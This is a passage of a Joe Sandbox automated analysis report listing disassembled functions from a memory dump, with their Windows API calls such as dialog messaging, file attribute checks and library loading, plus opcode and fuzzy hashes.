_swprintf.LIBCMT ref: 00B7F02C

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

SetDlgItemTextW.USER32(00000065,?), ref: 00B7F043

Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: a5c47843a369b5becf368c2a6bd99ca4336c240d78e2ebef2b58b8e0a846dfc6
Instruction ID: 942370136fcbe2c1fffbed279b501ca4c67af5b7dd8e671253065098fdb17e96
Opcode Fuzzy Hash: a5c47843a369b5becf368c2a6bd99ca4336c240d78e2ebef2b58b8e0a846dfc6
Instruction Fuzzy Hash: D2E0D17641424C76DF016761DC0BFEB3ADCAB097C9F0804A1B245971A2DF74D910DB72

Function 00B6B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00B6B4CA,?,00B68042,?), ref: 00B6B4E4

Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00B6B4CA,?,00B68042,?), ref: 00B6B510

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: e21fdbe1e33c118c53648b9acc6ebed7117d081f2adce00366ed847ec83a8ccb
Instruction ID: 777063eee57a4752b3ba5af18d02f54d8b770b27c757f3250e9b13b37362d364
Opcode Fuzzy Hash: e21fdbe1e33c118c53648b9acc6ebed7117d081f2adce00366ed847ec83a8ccb
Instruction Fuzzy Hash: A6E0D8315002286BCB20AB64DC14FD97BECEB193E5F0002B1FE5AE3195DB749D818AD0

Function 00B71B3B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: caf895a2385300c585c879ff28ac12f67452d7854d39b22c48a3ac856819d360
Instruction ID: a3ea370c6ef1f4cc8075ca96c12f64c92cddfb84753a5d73808e813c7238c603
Opcode Fuzzy Hash: caf895a2385300c585c879ff28ac12f67452d7854d39b22c48a3ac856819d360
Instruction Fuzzy Hash: C0E04F769001686ADB11ABA4DD09FDA77ACEF093C1F0444A6B649E3008DF74DA84CBB0

Function 00B7B3C8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7B3E9
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B7B3F0

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 21e5972d38c3896a3e6a654e2f4a493fabefa0d836749d6254edebad4330eb6d
Instruction ID: 013600d0801151b102b1d1fef65f95a0053f1647f472c5d93712f6bbd672b080
Opcode Fuzzy Hash: 21e5972d38c3896a3e6a654e2f4a493fabefa0d836749d6254edebad4330eb6d
Instruction Fuzzy Hash: 83E0ED71501218EFCB20DF99C541BA9B7E8EB04350F20C0AAE8A993600D374AF449B95

Function 00B83D1C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B83D3A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B83D45

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 3a6d279fe63bb1d32d4f129bdf2e6e09c44310e543310ff45d2efe89a498b367
Instruction ID: 41cfa580cf91d48278c77bca1872f32f7e7c964b4c224601d0d34b6435dacd9b
Opcode Fuzzy Hash: 3a6d279fe63bb1d32d4f129bdf2e6e09c44310e543310ff45d2efe89a498b367
Instruction Fuzzy Hash: EFD0223544870314CC0832786C0385923C4E822F71BA02AFAE0309B0F2FF248B01EB21

Function 00B612D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00B612E6
ShowWindow.USER32(00000000), ref: 00B612ED

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: e1e4c3ed217f3866606bab9cf76c2431aadea3f57ac73adffdc4791799c74449
Instruction ID: 93faf3e392bc21a941674485630bb438ed521cb3b91574134274d7032a1198c1
Opcode Fuzzy Hash: e1e4c3ed217f3866606bab9cf76c2431aadea3f57ac73adffdc4791799c74449
Instruction Fuzzy Hash: 91C01232058900BECB110B70DC0DD2A7BA8AB98211F15C904F1A5D2060C639C050DB11

Function 00B61AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B61AD8

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4bb526efebbf0051e755a05e7243bb322a1f39097c4f7eec7c7a120625c7e5f8
Instruction ID: eb48fef6ef205a5532b941b93832156429bb29b2f83458c472263586dddf6089
Opcode Fuzzy Hash: 4bb526efebbf0051e755a05e7243bb322a1f39097c4f7eec7c7a120625c7e5f8
Instruction Fuzzy Hash: E1C16231A002549BDF15CF2C8994BAD7BE5EF46310F1C09FAEC059F296CB399A44CBA1

Function 00B642F1 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B642F6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0c67a175041fc2054e5a2adee3f01d1bc857614d2d1eabf072526a341659a2ab
Instruction ID: 16f142c1ce5a8c72e70d49e08d3120ad724589b419f95d4143e8d3006e147b0d
Opcode Fuzzy Hash: 0c67a175041fc2054e5a2adee3f01d1bc857614d2d1eabf072526a341659a2ab
Instruction Fuzzy Hash: 7471C2B1504B859FCB21EB74C851AE7B7E8FF15300F0409AEE2AB43281DB79B644CB15

Function 00B690A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B690A7

Part of subcall function 00B613F8: __EH_prolog.LIBCMT ref: 00B613FD

Part of subcall function 00B62032: __EH_prolog.LIBCMT ref: 00B62037

Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: eb8293afac50fea1eee701d32e0337c15e0b57a6713e0e9e0616888b0d9c8192
Instruction ID: 822221e413b6183c9dc06e955a178225c78438cc68a6ef1e953e2802d98e0226
Opcode Fuzzy Hash: eb8293afac50fea1eee701d32e0337c15e0b57a6713e0e9e0616888b0d9c8192
Instruction Fuzzy Hash: 05417271904254AADB24DB64C8A5AEAB3FDFF11344F4404EAF58AA70C2DB795F89CF10

Function 00B613FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B613FD

Part of subcall function 00B66891: __EH_prolog.LIBCMT ref: 00B66896

Part of subcall function 00B6E298: __EH_prolog.LIBCMT ref: 00B6E29D

Part of subcall function 00B6644D: __EH_prolog.LIBCMT ref: 00B66452

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6314b6b6efcfe2068890e8dfb1272683f391ebccb1a89be81dc385a6e9bc5f0b
Instruction ID: edab172f1ff7d098aa4d82bbd332b8236cb89ae6d353495149a1e07e5b665649
Opcode Fuzzy Hash: 6314b6b6efcfe2068890e8dfb1272683f391ebccb1a89be81dc385a6e9bc5f0b
Instruction Fuzzy Hash: 145133B1A063808ECB14DF2994802D9BBE5AF59300F0846BEEC5DDF79BDB754214CB62

Function 00B613F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B613FD

Part of subcall function 00B66891: __EH_prolog.LIBCMT ref: 00B66896

Part of subcall function 00B6E298: __EH_prolog.LIBCMT ref: 00B6E29D

Part of subcall function 00B6644D: __EH_prolog.LIBCMT ref: 00B66452

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fc4f03bec8ea6eef25453ddd35fd5ac58abf41891516094e86b47477847d699b
Instruction ID: 73986ab84cd0c37ec9b0914d5487a1e64eba39ff859d7674042c9b044f20ecf7
Opcode Fuzzy Hash: fc4f03bec8ea6eef25453ddd35fd5ac58abf41891516094e86b47477847d699b
Instruction Fuzzy Hash: CE5132B19063808ECB14DF6994802D9BBE5AF29300F0846BEEC5DDF78BDB750214CB62

Function 00B747AD Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B747B2

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0e05cfee97c79e2f0fce6ecd6b4449434f2ad34787a7c5f11a31150bf6b83528
Instruction ID: 79a2ef62d0b025fc775b7dbda231500cc45acab84cc59362bbaa8875e7a0e2d6
Opcode Fuzzy Hash: 0e05cfee97c79e2f0fce6ecd6b4449434f2ad34787a7c5f11a31150bf6b83528
Instruction Fuzzy Hash: B92126B2E40216AFDB14EF74CC4566BB6E8FF04714F0046BAE529EB681E7709D00C7A9

Function 00B7C217 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7C21C

Part of subcall function 00B613F8: __EH_prolog.LIBCMT ref: 00B613FD

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22a5e8678653720349b0b48bded95d27f519eaa657b411a6db4f8f0828497a98
Instruction ID: d001c31af567d14f47128cda91a396cd5112579fb153bf8851454cc8f7260bb9
Opcode Fuzzy Hash: 22a5e8678653720349b0b48bded95d27f519eaa657b411a6db4f8f0828497a98
Instruction Fuzzy Hash: B1216D75804219AECF25EF98C8419EEBBF4FF05304F0044EDE81AB3252D7796A45EB60

Function 00B8BE58 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B8BEB8

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 477c4c6ade9ad9b32931b806e32f2b2851ef967b1e8ad70b61c2f0775aa3b4fa
Instruction ID: 3b24a6845d34c0dc3802cb0471b57eadbd8e10a1eee815fc087c6a8a42f97ca4
Opcode Fuzzy Hash: 477c4c6ade9ad9b32931b806e32f2b2851ef967b1e8ad70b61c2f0775aa3b4fa
Instruction Fuzzy Hash: 1911E333A005259F9B21BE38DC91CEA73E5DB85321B164AA0EE54AB664DB30EC01C7D0

Function 00B6A475 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B6A47A

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 666851c2a853ede8faa0a11c23aad7d8b9e116d33884d5e8d574bd45478a1092
Instruction ID: 3af9052bbee3ba35ad514e510f988cf43057ecbc72dca49bade79232764e8173
Opcode Fuzzy Hash: 666851c2a853ede8faa0a11c23aad7d8b9e116d33884d5e8d574bd45478a1092
Instruction Fuzzy Hash: 021191369005299BCF21EE68C895ABEB7F5EF84710B0141A9F816B7341DB789D018B91

Function 00B7EBA2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7EBA7

Part of subcall function 00B71983: _wcslen.LIBCMT ref: 00B71999

Part of subcall function 00B68823: __EH_prolog.LIBCMT ref: 00B68828

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 42601046e28d6f5060e2a4b02d69ad2100aa82377fc73b04cd3e39124f64fade
Instruction ID: 4e3943d74af08de4481e01dafcd7b585da5f2f5b395c4c688bc976176fef0d6f
Opcode Fuzzy Hash: 42601046e28d6f5060e2a4b02d69ad2100aa82377fc73b04cd3e39124f64fade
Instruction Fuzzy Hash: 6211E3325092809FE705EB68AC56BEC7FE4AB15310F1081EEF198973A2DFF55640CB62

Function 00B8D639 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8C337

_free.LIBCMT ref: 00B8D6A5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction ID: 591c5c205f6e57254f332c6d0f44cf1ba432f763d5e09ee2f1f114c8a368f19a
Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction Fuzzy Hash: 5101DBB22003495BE321AF59DC4195AFBE9EF95370F25055EE598532D0F630A805C774

Function 00B8C2F6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8C337

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee42c39bb1dadf0479ae0499236c7919c2a41a8b5e850fe16bd3e96c706a49d2
Instruction ID: c07193b337cdfd171e24868532a57ce7d7d0d2bfeaf36cfa99783f378d116fe1
Opcode Fuzzy Hash: ee42c39bb1dadf0479ae0499236c7919c2a41a8b5e850fe16bd3e96c706a49d2
Instruction Fuzzy Hash: 1AF0B471600125A6AB213E259D01A5A3FC8DF41761B14C092B809970B0DB30DD02D3F9

